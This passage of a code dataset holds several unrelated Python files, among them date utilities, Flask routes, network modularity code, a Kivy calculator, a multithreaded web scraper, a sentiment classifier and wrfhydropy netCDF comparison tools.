isgenerator(iterable):\n iterable = iter(iterable)\n next_page_iterable = _get_next_page_iterable_as_list(iterable, page_size)\n while next_page_iterable:\n yield next_page_iterable\n next_page_iterable = _get_next_page_iterable_as_list(iterable, page_size)\n\n\ndef _get_next_page_iterable_as_list(iterable, page_size):\n next_page_iterable = list(islice(iterable, page_size))\n return next_page_iterable\n\n\ndef convert_timestamp_in_milliseconds_to_datetime(timestamp_milliseconds):\n timestamp_milliseconds = int(timestamp_milliseconds)\n time_since_epoch = timedelta(milliseconds=timestamp_milliseconds)\n timestamp_as_datetime = _EPOCH_DATETIME + time_since_epoch\n return timestamp_as_datetime\n\n\ndef convert_timestamp_in_milliseconds_to_date(timestamp_milliseconds):\n timestamp_datetime = convert_timestamp_in_milliseconds_to_datetime(timestamp_milliseconds)\n timestamp_date = timestamp_datetime.date()\n return timestamp_date\n\n\ndef paginate(iterable, page_size):\n return list(ipaginate(iterable, page_size))\n\n\ndef convert_date_to_timestamp_in_milliseconds(datetime_or_date):\n timestamp = _convert_datetime_to_timestamp(datetime_or_date)\n date_timestamp_in_milliseconds = int(timestamp * 1000)\n return date_timestamp_in_milliseconds\n\n\ndef _convert_datetime_to_timestamp(datetime_or_date):\n if not isinstance(datetime_or_date, date):\n raise HubspotPropertyValueError(('{!r} is not a date').format(datetime_or_date))\n if isinstance(datetime_or_date, datetime):\n epoch = _EPOCH_DATETIME\n else:\n epoch = _EPOCH_DATE\n time_since_epoch = datetime_or_date - epoch\n timestamp = time_since_epoch.total_seconds()\n return timestamp\n\n\ndef get_uuid4_str():\n uuid4 = get_uuid4()\n return str(uuid4)","sub_path":"pycfiles/hubspot_contacts-1.1.1-py2.7/generic_utils.py","file_name":"generic_utils.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"359184847","text":"# vraca new sorted list from the items in iterable\n# vraca kopiju, ne menja stari niz\nnums = [6, 1, 5, 3, 2, 8]\nsorted_nums = sorted(nums)\nreverse_sorted = sorted(nums, reverse=True)\n\nprint(\"SORTED\", sorted_nums)\nprint(\"REVERSED\", reverse_sorted)\nprint(nums)\n\n# example\nusers = [\n {\"username\": \"samuel\", \"tweets\": [\"I love cake\", \"I love cats\", \"I love dogs\"]},\n {\"username\": \"katie\", \"tweets\": [\"I love my dogs\"]},\n {\"username\": \"jeff\", \"tweets\": [], \"color\": \"blue\"},\n {\"username\": \"sima\", \"tweets\": [], \"num\": 10, \"color\": \"red\"},\n {\"username\": \"pera\", \"tweets\": [\"Dogs are best\"]},\n {\"username\": \"dzudista\", \"tweets\": []},\n]\n\n# sortira po velicini dictionarija koji se nalazi u nizu\nsorted_by_size = sorted(users, key=len)\n\n# sortira po username\nsorted_by_username = sorted(users, key=lambda user: user['username'])\nprint(sorted_by_username)\n\n# sortira koji ima najvise tweets-a\nmost_active_user = sorted(users, key=lambda user: len(user[\"tweets\"]))\nprint(\"MOST:\", most_active_user)\n\n# example\nsongs = [\n {\"title\": \"happy birthday\", \"playcount\": 1},\n {\"title\": \"Survice\", \"playcount\": 6},\n {\"title\": \"YMNCA\", \"playcount\": 99},\n {\"title\": \"Toxic\", \"playcount\": 31},\n]\n\n# sortiraj po song['playcount']\nsort_by_playcount = sorted(songs, key=lambda song: song['playcount'])\nprint(sort_by_playcount)\n","sub_path":"8. sorted.py","file_name":"8. sorted.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"118355242","text":"from traceback import print_tb\n\nfrom flask import jsonify\n\nfrom app.api import bp\nfrom app.models import Resource, Language\n\n\n@bp.route('/resources', methods=['GET'])\ndef resources():\n return get_resources()\n\n\n@bp.route('/languages', methods=['GET'])\ndef languages():\n return get_languages()\n\n\ndef get_resources():\n resources = {}\n try:\n resources = Resource.query.all()\n\n except Exception as e:\n print_tb(e.__traceback__)\n print(e)\n\n finally:\n return jsonify([single_resource.serialize for single_resource in resources])\n\n\ndef get_languages():\n languages = {}\n\n try:\n languages = Language.query.all()\n\n except Exception as e:\n print_tb(e.__traceback__)\n print(e)\n\n finally:\n return jsonify([language.name for language in languages])\n","sub_path":"app/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"575515688","text":"import matplotlib.pyplot as plt\nimport math\nimport numpy\n\nf = open(\"../random-result.txt\")\n\nrandom = []\nfor line in f:\n random.append(list(line.strip('\\n').split(' ')))\n\nx = []\ny = []\n\nfor i in range(100):\n x.append(eval(random[i][0]))\n y.append(eval(random[i][1]))\n\nabcd = []\n\nfor i in range(3):\n abcd.append(eval(random[100][i]))\n\n#plt.scatter(x,y)\n#plt.show()\n\nx_e = numpy.linspace(0,1,1000)\ny_e = [math.exp(abcd[0]*(i**2)+abcd[1]*(i**1)+abcd[2]) for i in x_e]\n\nx_r = numpy.linspace(0,1,1000)\ny_r = [math.exp(1*(i**2)+2*(i**1)+1) for i in x_r ]\n\nplt.plot(x_e,y_e)\nplt.plot(x_r,y_r)\nplt.show()","sub_path":"ch6/ceres_curve_fitting/test_result/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"51243140","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 5 13:58:43 2017\r\n\r\n@author: Administrator\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport networkx as nx\r\nfrom mvv_karate import karate_network,karate_community_dict\r\n#print (dolphin_network.degree(0))\r\nG = karate_network\r\nG_adjacency = {}\r\nfor i in G.nodes():\r\n G_adjacency[i] = G.neighbors(i)\r\n#print (G_adjacency)\r\nG_adjacency_dict = {}\r\nfor i in G_adjacency:\r\n for j in G_adjacency[i]:\r\n G_adjacency_dict[(i,j)] = 1\r\n#print (G_adjacency_dict)\r\n#\r\n# \r\nG_adjacency_matrix = []\r\nfor i in range(len(G.nodes())):\r\n a = []\r\n for j in range(len(G.nodes())):\r\n if (sorted(G.nodes())[i],sorted(G.nodes())[j]) in G_adjacency_dict:\r\n a.append(1)\r\n else:\r\n a.append(0)\r\n G_adjacency_matrix.append(a)\r\nG_adjacency_matrix = np.mat(G_adjacency_matrix)\r\n#print (G_adjacency_matrix)\r\n#\r\n####\r\n#\r\n####\r\n#community_dict = {'1':2,'3':1,'2':2,}\r\n#cmmatrix = [] \r\n#n = 2\r\n#for i in community_dict:\r\n# data = [0 for i in np.arange(n)]\r\n# #print (data)\r\n# if community_dict[i] == 1:\r\n# data[0] =1\r\n# cmmatrix.append(data)\r\n# if community_dict[i] == 2:\r\n# data[1] =1\r\n# cmmatrix.append(data)\r\n#print (cmmatrix)\r\n#community_dict = {'1':2,'3':1,'2':2,}\r\ncmmatrix = [] \r\nn = 2\r\nfor i in karate_community_dict:\r\n data = [0 for i in np.arange(n)]\r\n #print (data)\r\n if karate_community_dict[i] == 0:\r\n data[0] =1\r\n cmmatrix.append(data)\r\n if karate_community_dict[i] == 1:\r\n data[1] =1\r\n cmmatrix.append(data)\r\n# if karate_community_dict[i] == 2:\r\n# data[2] =1\r\n# cmmatrix.append(data)\r\n# if karate_community_dict[i] == 3:\r\n# data[3] =1\r\n# cmmatrix.append(data)\r\n# if karate_community_dict[i] == 4:\r\n# data[4] =1\r\n# cmmatrix.append(data)\r\n#print (cmmatrix)\r\n#print (sum(G_adjacency_matrix))\r\nB = np.zeros((len(G_adjacency_matrix),len(G_adjacency_matrix)))\r\n#print (B)\r\nfor i in range(len(G_adjacency_matrix)):\r\n for j in range(len(G_adjacency_matrix)):\r\n list1 = sorted(G.nodes())\r\n C = karate_network.degree(list1[i])*karate_network.degree(list1[j])\r\n #print(C)\r\n C = C/(2*(len(karate_network.edges())))\r\n #print (C)\r\n B[i,j] = G_adjacency_matrix[i,j] - C\r\nS = np.mat(cmmatrix).T * B * np.mat(cmmatrix)\r\nQ = np.trace(S)/(2*(len(karate_network.edges())))\r\nprint (Q)","sub_path":"code/modularity_karate.py","file_name":"modularity_karate.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"210610540","text":"# Program to create a calculator \t\r\n# Program to Show how to create a switch \r\n# import kivy module\t \r\nimport kivy \r\nimport math\t\r\n# base Class of your App inherits from the App class.\t \r\n# app:always refers to the instance of your application \r\nfrom kivy.app import App \r\n\t\r\n# this restrict the kivy version i.e \r\n# below this kivy version you cannot \r\n# use the app or software \r\nkivy.require('1.9.0') \r\n\r\n# for making multiple bttons to arranging \r\n# them we are using this \r\nfrom kivy.uix.gridlayout import GridLayout \r\n\r\n# for the size of window \r\nfrom kivy.config import Config \r\n\r\n# Setting size to resizable \r\nConfig.set('graphics', 'resizable', 1) \r\n## Config.set('graphics', 'width', '400') \r\n## Config.set('graphics', 'height', '400') \r\n\r\n\r\n# Creating Layout class \r\nclass Calc(GridLayout): \r\n\r\n\t# Function called when equals is pressed \r\n\tdef calculate(self, calculation): \r\n\t\tif calculation: \r\n\t\t\ttry: \r\n\t\t\t\t# Solve formula and display it in entry \r\n\t\t\t\t# which is pointed at by display \r\n\t\t\t\tself.display.text = str(eval(calculation)) \r\n\t\t\texcept Exception: \r\n\t\t\t\tself.display.text = \"Error\"\r\n\tdef sind(self,a):\r\n\t\ttry: \r\n\t\t\tself.display.text= str(\"{0:.9f}\".format(math.sin((math.radians(float(a))))))\r\n\t\texcept Exception: \r\n\t\t\tself.display.text = \"Error\"\r\n\tdef cosd(self,a):\r\n\t\ttry:\r\n\t\t\tself.display.text= str(\"{0:.9f}\".format(math.cos((math.radians(float(a))))))\r\n\t\texcept Exception: \r\n\t\t\tself.display.text = \"Error\"\r\n\t\r\n# Creating App class \r\nclass CalculatorApp(App): \r\n\r\n\tdef build(self): \r\n\t\treturn Calc() \r\n\r\n# creating object and running it \r\ncalcApp = CalculatorApp() \r\ncalcApp.run() \r\n\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"553588920","text":"import threading#线程\nfrom queue import Queue#队列\nfrom lxml import etree#解析\nimport requests#请求\nimport json#储存\n\n#循环退出条件\nCRAWL_EXIT = True\n#解析退出条件\nPARSE_EXIT = True\n\nclass ThreadParse(threading.Thread):\n def __init__(self,threadName,dataQueue,fileName):\n super(ThreadParse,self).__init__()\n self.threadName = threadName\n self.dataQueue = dataQueue\n self.fileName = fileName\n\n def run(self):\n print('启动'+self.threadName+'-->')\n while not PARSE_EXIT:\n try:\n html = self.dataQueue.get(False)\n self.parse(html)\n except:\n print('dataQueue is Empty!!!')\n print('<--'+self.threadName+'结束')\n\n def parse(self,html):\n theHtml = etree.HTML(html)\n nodeList = theHtml.xpath('//div[@class=\"article block untagged\"]')\n for node in nodeList:\n userName = node.xpath('div[@class=\"author\"]/a[2]/h2/text')\n userUrl = node.xpath('div[@class=\"author\"]/a[1]/@href')\n nodeText = node.xpath('a[@class=\"contentHerf\"]/div/span/text')\n textUrl = node.xpath('a[@class=\"contentHerf\"]/@href')\n rating = node.xpath('div[@class=\"stats\"]/span[@class=\"stats-vote\"]/i/text')\n item = {#封装数据\n 'userName':userName,\n 'userUrl':userUrl,\n 'nodeText':nodeText,\n 'textUrl':textUrl,\n 'rating':rating\n }\n json_data = json.dump(item,ensure_ascii=False)#转json格式\n with open(self.fileName,'wb') as f:\n f.write(json_data)\n\nclass ThreadCrawl(threading.Thread):\n def __init__(self,threadName,pageQueue,dataQueue):\n #threading.Thread.__init__(self)\n super(ThreadCrawl,self).__init__()\n self.threadName = threadName\n self.pageQueue = pageQueue\n self.dataQueue = dataQueue\n self.headers = {\n 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'\n }\n\n def run(self):\n print('启动'+self.threadName+'-->')\n while not CRAWL_EXIT:\n try:\n #可选参数block,默认值为True,如果队列为空,block为True,就会进入阻塞状态\n #如果队列为空,block为False的话,就弹出一个Queue.empty()异常\n page = self.pageQueue.get()#取出一个,先进的先出\n url = 'https://www.qiushibaike.com/8hr/page/'+str(page)+'/'\n content = requests.get(url,headers = self.headers)\n self.dataQueue.put(content)\n except:\n print('block=False,throw a empty ERROR!!!')\n print('<--'+self.threadName+'结束')\n\ndef main():\n pageQueue = Queue(10)#不写就是无限个页面\n for i in range(1,11):\n pageQueue.put(i)\n #采集结果的队列��每一页的html源码)\n dataQueue = Queue()\n\n fileName = open('duanzi.json','wb')\n\n crawlList = ['get01','get02','get03']#三个线程名字\n threadCrawl = []#用来存储线程\n for threadName in crawlList:\n thread = ThreadCrawl(threadName,pageQueue,dataQueue)\n thread.start()\n threadCrawl.append(thread)\n\n parseList = ['parse01','parse02','parse03']\n threadParse = []\n for threadName in parseList:\n thread = ThreadParse(threadName,dataQueue,fileName)\n thread.start()\n threadParse.append(thread)\n\n #等待之前的操作执行完毕,采集线程退出循环\n while pageQueue.empty():\n pass\n\n global CRAWL_EXIT\n CRAWL_EXIT = True\n print('The PageQueue is Empty!!!')\n\n for thread in threadCrawl:\n thread.join()\n print('-0-')\n\n for thread in threadParse:\n thread.join()\n print('-1-')\n\nif __name__ == '__main__':\n print('由于技术原因,多线程爬虫未完成,待今回来后完成!!!')","sub_path":"02/MoreThreadSpider/PowerSpider.py","file_name":"PowerSpider.py","file_ext":"py","file_size_in_byte":4005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"45389393","text":"from sys import stdin\n\nSUITS = ('Clubs', 'Spades', 'Diamonds', 'Hearts')\nRANKS = ('2', '3', '4', '5', '6', '7', '8', '9', '10',\n 'Jack', 'Queen', 'King', 'Ace')\nOUTPUT = '{}-of-{}'.format\n\n\ndef rank_of_suit(card_num):\n suit_value, rank_value = divmod(card_num, 13)\n return OUTPUT(RANKS[rank_value], SUITS[suit_value])\n\nnext(stdin)\nprint(' '.join(map(rank_of_suit, map(int, next(stdin).split()))))\n","sub_path":"p58.py","file_name":"p58.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"31755854","text":"import deepdiff\nimport f90nml\nimport io\nimport os\nimport pandas as pd\nimport pathlib\nimport subprocess\nimport warnings\nimport xarray as xr\nfrom .job_tools import touch\nimport pathlib\nimport numpy as np\n\ndef compare_nc_nccmp(candidate_nc: str,\n reference_nc: str,\n nccmp_options: list = ['--data','--metadata','--force','--quiet'],\n exclude_vars: list = None):\n\n \"\"\"Compare two netcdf files using nccmp\n Args:\n candidate_restart: The path for the candidate restart file\n ref_restarts: The path for the reference restart file\n nccmp_options: List of long-form command line options passed to nccmp,\n see http://nccmp.sourceforge.net/ for options\n exclude_vars: A list of strings containing variables names to\n exclude from the comparison\n Returns:\n Either a pandas dataframe if possible or subprocess object\n \"\"\"\n #Try and set files to strings\n candidate_nc = str(candidate_nc)\n reference_nc = str(reference_nc)\n\n # Make list to pass to subprocess\n command_list=['nccmp']\n\n for item in nccmp_options:\n command_list.append(item)\n\n command_list.append('-S')\n\n if exclude_vars is not None:\n # Convert exclude_vars list into a comman separated string\n exclude_vars = ','.join(exclude_vars)\n #append\n command_list.append('-x ' + exclude_vars)\n\n command_list.append(candidate_nc)\n command_list.append(reference_nc)\n\n #Run the subprocess to call nccmp\n proc = subprocess.run(command_list,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n #Check return code\n if proc.returncode != 0:\n # Get stoud into stringio object\n output = io.StringIO()\n output.write(proc.stdout.decode('utf-8'))\n output.seek(0)\n\n # Open stringio object as pandas dataframe\n try:\n nccmp_out = pd.read_table(output,delim_whitespace=True,header=0)\n return nccmp_out\n except:\n warnings.warn('Probleming reading nccmp output to pandas dataframe,'\n 'returning as subprocess object')\n return proc\n\n\ndef compare_ncfiles(candidate_files: list,\n reference_files: list,\n nccmp_options: list = ['--data', '--metadata', '--force', '--quiet'],\n exclude_vars: list = ['ACMELT','ACSNOW','SFCRUNOFF','UDRUNOFF','ACCPRCP',\n 'ACCECAN','ACCEDIR','ACCETRAN','qstrmvolrt']):\n \"\"\"Compare lists of netcdf restart files element-wise. Files must have common names\n Args:\n candidate_files: List of candidate restart file paths\n reference_files: List of reference restart file paths\n nccmp_options: List of long-form command line options passed to nccmp,\n see http://nccmp.sourceforge.net/ for options\n exclude_vars: A list of strings containing variables names to\n exclude from the comparison\n Returns:\n A named list of either pandas dataframes if possible or subprocess objects\n \"\"\"\n\n ref_dir = reference_files[0].parent\n output_list = []\n for file_candidate in candidate_files:\n file_reference = ref_dir.joinpath(file_candidate.name)\n if file_reference.is_file():\n nccmp_out = compare_nc_nccmp(candidate_nc=file_candidate,\n reference_nc=file_reference,\n nccmp_options=nccmp_options,\n exclude_vars=exclude_vars)\n output_list.append(nccmp_out)\n else:\n warnings.warn(str(file_candidate) + 'not found in ' + str(ref_dir))\n return output_list\n\n###Retaining for backwards compatibility until deprecated\ncompare_restarts = compare_ncfiles\n\ndef diff_namelist(namelist1: str, namelist2: str, **kwargs) -> dict:\n \"\"\"Diff two fortran namelist files and return a dictionary of differences.\n\n Args:\n namelist1: String containing path to the first namelist file.\n namelist2: String containing path to the second namelist file.\n **kwargs: Additional arguments passed onto deepdiff.DeepDiff method\n Returns:\n The differences between the two namelists\n \"\"\"\n\n # Read namelists into dicts\n namelist1 = f90nml.read(namelist1)\n namelist2 = f90nml.read(namelist2)\n # Diff the namelists\n differences = deepdiff.DeepDiff(namelist1, namelist2, ignore_order=True, **kwargs)\n differences_dict = dict(differences)\n return (differences_dict)\n\n\ndef open_nwmdataset(paths: list,\n chunks: dict=None,\n forecast: bool = True) -> xr.Dataset:\n \"\"\"Open a multi-file wrf-hydro output dataset\n\n Args:\n paths: List ,iterable, or generator of file paths to wrf-hydro netcdf output files\n chunks: chunks argument passed on to xarray DataFrame.chunk() method\n forecast: If forecast the nreference time dimensions is retained, if not then\n reference_time dimension is set to a dummy value (1970-01-01) to ease concatenation\n and analysis\n Returns:\n An xarray dataset of dask arrays chunked by chunk_size along the feature_id\n dimension concatenated along the time and\n reference_time dimensions\n \"\"\"\n\n # Create dictionary of forecasts, i.e. reference times\n ds_dict = dict()\n for a_file in paths:\n ds = xr.open_dataset(a_file,chunks=chunks)\n # Check if forecast and set reference_time to zero if not\n if not forecast:\n ds.coords['reference_time'].values = np.array(\n [np.datetime64('1970-01-01T00:00:00', 'ns')])\n\n ref_time = ds['reference_time'].values[0]\n if ref_time in ds_dict:\n # append the new number to the existing array at this slot\n ds_dict[ref_time].append(ds)\n else:\n # create a new array in this slot\n ds_dict[ref_time] = [ds]\n\n # Concatenate along time axis for each forecast\n forecast_list = list()\n for key in ds_dict.keys():\n forecast_list.append(xr.concat(ds_dict[key],\n dim='time',\n coords='minimal'))\n\n # Concatenate along reference_time axis for all forecasts\n nwm_dataset = xr.concat(forecast_list,\n dim='reference_time',\n coords='minimal')\n\n # Break into chunked dask array\n if chunks is not None:\n nwm_dataset = nwm_dataset.chunk(chunks=chunks)\n\n return nwm_dataset\n\n\ndef __make_relative__(run_object, basepath=None):\n \"\"\"Make all file paths relative to a given directory, useful for opening file\n attributes in a run object after it has been moved or copied to a new directory or\n system.\n Args:\n basepath: The base path to use for relative paths. Defaults to run directory.\n This rarely needs to be defined.\n Returns:\n self with relative files paths for file-like attributes\n \"\"\"\n import wrfhydropy\n if basepath is None:\n basepath = run_object.simulation_dir\n for attr in dir(run_object):\n if attr.startswith('__') is False:\n attr_object = getattr(run_object, attr)\n if type(attr_object) == list:\n relative_list = list()\n for item in attr_object:\n if type(item) is pathlib.PosixPath or type(\n item) is wrfhydropy.WrfHydroStatic:\n relative_list.append(item.relative_to(basepath))\n setattr(run_object, attr, relative_list)\n if type(attr_object) is wrfhydropy.WrfHydroTs:\n relative_list = list()\n for item in attr_object:\n if type(item) is pathlib.PosixPath or type(\n item) is wrfhydropy.WrfHydroStatic:\n relative_list.append(item.relative_to(basepath))\n relative_list = wrfhydropy.WrfHydroTs(relative_list)\n setattr(run_object, attr, relative_list)\n\n elif type(attr_object) is pathlib.PosixPath:\n setattr(run_object, attr, attr_object.relative_to(basepath))\n\n if attr == 'simulation':\n __make_relative__(run_object.simulation.domain,\n basepath=run_object.simulation.domain.domain_top_dir)\n\n\ndef get_pickle_lock_file(run_obj):\n return run_obj.run_dir / 'pickle_locked'\n\n\ndef lock_pickle(run_obj):\n if is_pickle_locked(run_obj):\n raise ValueError('The pickle file, ' + run_obj.run_dir + ', is already locked')\n pickle_lock_file = get_pickle_lock_file(run_obj)\n touch(pickle_lock_file)\n run_obj._pickle_lock_file = pickle_lock_file\n\n\ndef unlock_pickle(run_obj):\n if not is_pickle_locked(run_obj):\n raise ValueError('The pickle file, ' + run_obj.run_dir + ', is already unlocked')\n pickle_lock_file = get_pickle_lock_file(run_obj)\n os.remove(pickle_lock_file)\n run_obj._pickle_lock_file = None\n\n\ndef is_pickle_locked(run_obj):\n internal_lock = run_obj._pickle_lock_file is not None\n pickle_lock_file = get_pickle_lock_file(run_obj)\n external_lock = pickle_lock_file.exists()\n total_lock = internal_lock + external_lock\n if total_lock == 1:\n raise ValueError('The internal_lock must match external_lock.')\n return bool(total_lock)\n\n\ndef get_git_revision_hash(the_dir):\n\n # First test if this is even a git repo. (Have to allow for this unless the wrfhydropy\n # testing brings in the wrf_hydro_code as a repo with a .git file.)\n dir_is_repo = subprocess.call(\n [\"git\", \"branch\"],\n stderr=subprocess.STDOUT,\n stdout=open(os.devnull, 'w'),\n cwd=the_dir\n )\n if dir_is_repo != 0:\n warnings.warn('The source directory is NOT a git repo: ' + str(the_dir))\n return 'not-a-repo'\n\n dirty = subprocess.run(\n ['git', 'diff-index', 'HEAD'], # --quiet seems to give the wrong result.\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n cwd=the_dir\n ).returncode\n the_hash = subprocess.check_output(['git', 'rev-parse', 'HEAD'], cwd=the_dir)\n the_hash = the_hash.decode('utf-8').split()[0]\n if dirty:\n the_hash += '--DIRTY--'\n return the_hash\n","sub_path":"wrfhydropy/core/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":10408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"522006673","text":"import Pyro4\n\n\n@Pyro4.expose\nclass GreetingMaker(object):\n def get_fortune(self, name):\n return \"Hello, {0}\".format(name)\n\n\ndaemon = Pyro4.Daemon()\nns = Pyro4.locateNS()\n\nuri = daemon.register(GreetingMaker)\nns.register(\"pavillion.greeting\", uri)\n\n\nprint(\"Ready.\")\ndaemon.requestLoop()\n","sub_path":"python/pyro_server.py","file_name":"pyro_server.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"364507125","text":"from random import randint\nprint('=-='*10)\nprint('VAMOS JOGAR PAR OU IMPAR')\nprint('=-='*10)\nv = 0\nwhile True:\n jogador = int(input('Diga um valor: '))\n computador = randint(0,10)\n total = jogador +computador\n tipo =' '\n while tipo not in 'PI':\n tipo = str(input('Par ou Impar? [P/I] ')).upper().strip()[0]\n print(f'Voce jogou {jogador} e o computador {computador}.Total de {total} ', end='')\n print('Deu PAR'if total %2 == 0 else 'Deu IMPAR')\n if tipo == 'P':\n if total % 2 == 0:\n print('Voce VENCEU!!!!')\n v += 1\n else:\n print('Voce PERDEU!!!')\n break\n elif tipo =='I':\n if total% 2 == 1:\n print('Voce VENCEU!!!')\n v += 1\n else:\n print('Voce PERDEU!!!')\n break\n print('Vamos joga novamente...')\nprint(f'Game OVER!!! Voce venceu {v} vezes.')\n\n","sub_path":"EX./ex068.py","file_name":"ex068.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"456772169","text":"from nltk.classify import NaiveBayesClassifier\nimport pickle\nimport os.path as osp\n\n# SOURCE LINK\n# https://streamhacker.com/2010/05/10/text-classification-sentiment-analysis-naive-bayes-classifier/\nfrom nltk.corpus import movie_reviews\n\n\ndef word_feats(words):\n return dict([(word, True) for word in words])\n\ndef init_classifier():\n if osp.exists(\"classifier.pickle\"):\n return (load_classifier())\n negids = movie_reviews.fileids('neg')\n posids = movie_reviews.fileids('pos')\n\n negfeats = [(word_feats(movie_reviews.words(fileids=[f])), 'neg') for f in negids]\n posfeats = [(word_feats(movie_reviews.words(fileids=[f])), 'pos') for f in posids]\n\n trainfeats = negfeats + posfeats\n save_classifier(NaiveBayesClassifier.train(trainfeats))\n return (NaiveBayesClassifier.train(trainfeats))\n\n\n\ndef classify_corpus(corpus = ''):\n classifier = init_classifier()\n\n probabilty_distance = classifier.prob_classify(word_feats(corpus))\n\n pos_result = round(probabilty_distance.prob(\"pos\"), 2)\n neg_result = 1 - pos_result\n return({'pos' : pos_result, 'neg' : neg_result})\n\ndef classify_corpus_list(list = []):\n sum_pos = 0\n sum_neg = 0\n for corpus in list:\n res = classify_corpus(corpus)\n sum_pos += res['pos']\n sum_neg += res['neg']\n sum = sum_pos + sum_neg\n pos = sum_pos / sum\n neg = sum_neg / sum\n return({'pos' : pos, 'neg' : neg})\n\ndef save_classifier(classifier):\n f = open('classifier.pickle', 'wb')\n pickle.dump(classifier, f)\n f.close()\n\ndef load_classifier():\n f = open('classifier.pickle', 'rb')\n classifier = pickle.load(f)\n f.close()\n return classifier","sub_path":"SentimentalService/sentimental.py","file_name":"sentimental.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"334140051","text":"from scale_client.sensors.virtual_sensor import VirtualSensor\n#import RPi.GPIO as GPIO\n\nclass GPIOVirtualSensor(VirtualSensor):\n\tdef __init__(self, queue, device, gpio_pin):\n\t\tVirtualSensor.__init__(self, queue, device)\n\t\tself._pin = gpio_pin\n\t\tself._GPIO = None\n\n\tdef connect(self):\n\t\t# use P1 GPIO pin numbering convention\n\t\tif self._GPIO is None:\n\t\t\timport RPi.GPIO as GPIO\n\n\t\t\tself._GPIO = GPIO\n\n\t\tself._GPIO.setmode(GPIO.BCM)\n\t\t# set up GPIO channel\n\t\tself._GPIO.setup(self._pin, GPIO.IN)\n\t\treturn True\n","sub_path":"scale_client/sensors/gpio_virtual_sensor.py","file_name":"gpio_virtual_sensor.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"261544948","text":"# Read data from the txt\ncontent=[]\nf= open(\"0.01_0.8_1k.txt\",'r')\nfor line in f:\n content.append(line.split())\nlist_of_p= []\nlist_of_q = []\nlist_of_z=[]\nlist_of_end=[]\nlist_of_it=[]\nfor p in range(100):\n list_of_p.append(p*0.01)\n list_of_q.append(p*0.01)\n\nfor item in content:\n list_of_end.append(float(item[3]))\n list_of_it.append(float(item[4]))\nnew_it = []\nnew_end =[]\nfor index in range(99):\n new_it.append(list_of_it[99*index:99+index*99])\n new_end.append(list_of_end[99*index:99+index*99])\n\nimport plotly.graph_objects as go\nfig = go.Figure(go.Surface(\n contours = {\n \"x\": {\"show\": True, \"start\": 1.5, \"end\": 2, \"size\": 0.04, \"color\":\"white\"},\n \"z\": {\"show\": True, \"start\": 0.5, \"end\": 0.8, \"size\": 0.05}\n },\n x = list_of_p,\n y = list_of_q,\n z = new_end))\nfig.update_layout(\n scene = {\n 'camera_eye': {\"x\": 0, \"y\": -1, \"z\": 0.5},\n \"aspectratio\": {\"x\": 1, \"y\": 1, \"z\": 0.2}\n })\nfig.show()\nfig = go.Figure(go.Surface(\n contours = {\n \"x\": {\"show\": True, \"start\": 1.5, \"end\": 2, \"size\": 0.04, \"color\":\"white\"},\n \"z\": {\"show\": True, \"start\": 0.5, \"end\": 0.8, \"size\": 0.05}\n },\n x = list_of_p,\n y = list_of_q,\n z = new_it))\nfig.update_layout(\n scene = {\n 'camera_eye': {\"x\": 0, \"y\": -1, \"z\": 0.5},\n \"aspectratio\": {\"x\": 1, \"y\": 1, \"z\": 0.2}\n })\nfig.show()\n","sub_path":"high_res_graphs.py","file_name":"high_res_graphs.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"208669311","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nNapkin wiki.\n\"\"\"\n\nimport datetime\n\nimport flask\nimport json\n\nimport markdown\n\nfrom napkin.pages import utils as index_utils\nfrom napkin.db import api as db_api\n\n\nURL_PREFIX_WIKI_WEB = '/wiki'\n\n\ndef app_load_web_wiki(app, opts=None):\n\n\n def wiki_util_page_check_lock(pg):\n if not pg:\n return False\n\n if pg.state != 'lock':\n return False\n\n locked_at = pg.locked_at\n if not locked_at:\n return False\n\n time_now = datetime.datetime.now()\n tm_delta = time_now - locked_at\n d_sec = tm_delta.total_seconds()\n #if d_sec > 60 * 60: # 1 